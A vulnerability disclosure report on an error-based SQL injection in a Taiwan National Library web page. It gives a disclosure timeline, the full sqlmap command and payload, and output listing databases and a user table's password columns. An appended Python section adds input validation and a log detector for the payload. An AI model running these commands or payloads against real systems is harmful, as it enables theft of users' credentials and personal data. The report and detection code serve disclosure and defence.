2015-10-18: Details sent to the vendor, awaiting vendor handling
2015-10-19: Vendor confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and relevant domain experts
2015-11-08: Details disclosed to ordinary white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public

SQL injection vulnerability in a page of the Taiwan National Library (146 tables; user names, ids and plaintext passwords obtainable)

Tested with sqlmap. Test URL: http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421
python sqlmap.py -u "http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421" -p cnt_id --technique=E --random-agent --threads=10 -D catweb -T userprofile -C Fuser_id,Fuser_name,Fuser_passwd,Fuser_email,Fuser_phone --dump
---
Parameter: cnt_id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: button_num=e2&folder_id=4&cnt_id=421' AND (SELECT 2004 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2004=2004,1))),0x716a6b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WPFI'='WPFI
---
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
current user: 'totoro@%'
current user is DBA: False

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
available databases [7]:
[*] catweb
[*] catweb_test
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
Database: catweb
[146 tables]
back-end DBMS: MySQL 5.0
Database: catweb
Table: userprofile
[15 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| Fdate_expired     | date             |
| Fdate_registered  | date             |
| Fis_show_menunote | varchar(2)       |
| Fuser_cell        | varchar(20)      |
| Fuser_email       | varchar(50)      |
| Fuser_id          | varchar(255)     |
| Fuser_name        | varchar(255)     |
| Fuser_open        | varchar(10)      |
| Fuser_org         | varchar(255)     |
| Fuser_passwd      | varchar(255)     |
| Fuser_phone       | varchar(50)      |
| Fuser_rowid       | int(10) unsigned |
| Fuser_title       | varchar(50)      |
| Fuser_type        | varchar(8)       |
| rank              | int(30)          |
+-------------------+------------------+

back-end DBMS: MySQL 5.0
Database: catweb
Table: userprofile
[11 entries]
(columns dumped: Fuser_id, Fuser_name, Fuser_passwd, Fuser_email, Fuser_phone)
Fix: add input filtering.
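The injected parameter, cnt_id, is only ever a numeric id in the reported URL, so the concrete "filtering" is an allow-list check, and the same two facts (a non-numeric cnt_id, and the COUNT(*)/CONCAT/FLOOR(RAND(0)*2)/GROUP BY shape of the error-based payload above) give a log-side detection. This is an added example, not code from the report or the library's site; the log lines are constructed, and the function and regex names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Shape of the MySQL error-based technique shown in the sqlmap output above:
# COUNT(*) with CONCAT(...) and FLOOR(RAND(0)*2) grouped in a subquery, which
# forces a duplicate-key error whose message carries the selected value.
ERROR_BASED_RE = re.compile(
    r"count\(\*\).*concat\(.*floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by",
    re.IGNORECASE | re.DOTALL,
)

# Apache combined log line; only the client ip and request target are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def cnt_id_is_valid(value: str) -> bool:
    """Allow-list check for cnt_id: the page only uses integer ids (e.g. 421)."""
    return value.isdigit() and len(value) <= 10

def classify_request(target: str) -> str:
    """Return 'ok', 'invalid-cnt_id' or 'error-based-sqli' for one request target."""
    query = urlsplit(target).query
    if ERROR_BASED_RE.search(unquote_plus(query)):
        return "error-based-sqli"
    for v in parse_qs(query, keep_blank_values=True).get("cnt_id", []):
        if not cnt_id_is_valid(v):
            return "invalid-cnt_id"
    return "ok"

def flag_log(lines):
    """Return (ip, verdict, target) for every request that is not 'ok'."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line, skipped rather than silently passed
        verdict = classify_request(m.group("target"))
        if verdict != "ok":
            hits.append((m.group("ip"), verdict, m.group("target")))
    return hits

# Constructed sample log (not from the report). The third line carries the
# report's payload URL-encoded the way a client would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2015:10:00:01 +0800] "GET /portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Oct/2015:10:00:02 +0800] "GET /portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421%27 HTTP/1.1" 500 312',
    '203.0.113.5 - - [18/Oct/2015:10:00:03 +0800] "GET /portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421%27%20AND%20%28SELECT%202004%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162767171%2C%28SELECT%20%28ELT%282004%3D2004%2C1%29%29%29%2C0x716a6b7671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27WPFI%27%3D%27WPFI HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for hit in flag_log(SAMPLE_LOG):
        print(hit)
```

On the application side the allow-list check belongs in front of the query together with a parameterized statement; the log classifier is for finding attempts that already reached the server.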
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-10-19 23:15
Thank you for the report.
None.